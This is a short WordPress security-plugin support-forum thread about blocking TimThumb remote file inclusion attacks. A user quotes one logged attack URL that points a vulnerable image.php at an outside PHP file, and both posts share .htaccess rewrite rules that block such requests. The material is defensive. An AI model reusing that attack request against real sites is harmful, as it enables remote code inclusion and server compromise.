Timthumb protection – new attack type

Home Forums BulletProof Security Free Timthumb protection – new attack type

Tagged: 

Viewing 2 posts - 1 through 2 (of 2 total)
  • Author
    Posts
  • April 13, 2013 at 5:50 am #4306
    Bartek
    Member

    Dear BulletProof Team,

    I’m experiencing new type of Timthumb attack on my website. I think it is not covered in the latest BulletProof Free version.
    Example: ../wp-content/plugins/sam-images/helpers/timthumb/image.php?src=http://flickr.com.hausundgartenshop24.de/parola.php
    The bot is attacking with use of ‘flickr.com’. To protect, I added ‘flickr’ into the .htaccess

    RewriteCond %{QUERY_STRING} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(flickr|blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC,OR]
RewriteCond %{THE_REQUEST} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(flickr|blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC]

    Thanks for great plugin!!
    Bartek

    April 13, 2013 at 7:28 am #4316
    AITpro Admin
    Keymaster

    The top section of code in the timthumb security filter is a bit older.  We added the HTTP_REFERER condition in a later version of BPS, which is a much better way of blocking any domain/an external Referrer from successfully exploiting timthumb files.  That new condition protects against any external timthumb attack no matter what the originating/external domain name is.  It would already block flickr.  I assume you found the flicker timthumb attack logged in your Security Log, which means that it was successfully blocked/forbidden.

    # TIMTHUMB FORBID RFI and MISC FILE SKIP/BYPASS RULE
# Only Allow Internal File Requests From Your Website
# To Allow Additional Websites Access to a File Use [OR] as shown below.
# RewriteCond %{HTTP_REFERER} ^.*YourWebsite.com.* [OR]
# RewriteCond %{HTTP_REFERER} ^.*AnotherWebsite.com.*
RewriteCond %{QUERY_STRING} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC,OR]
RewriteCond %{THE_REQUEST} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC]
RewriteRule .* index.php [F,L]
RewriteCond %{REQUEST_URI} (timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]
RewriteCond %{HTTP_REFERER} ^.*ait-pro.com.*
RewriteRule . - [S=1]
  • Author
    Posts
Viewing 2 posts - 1 through 2 (of 2 total)
  • You must be logged in to reply to this topic.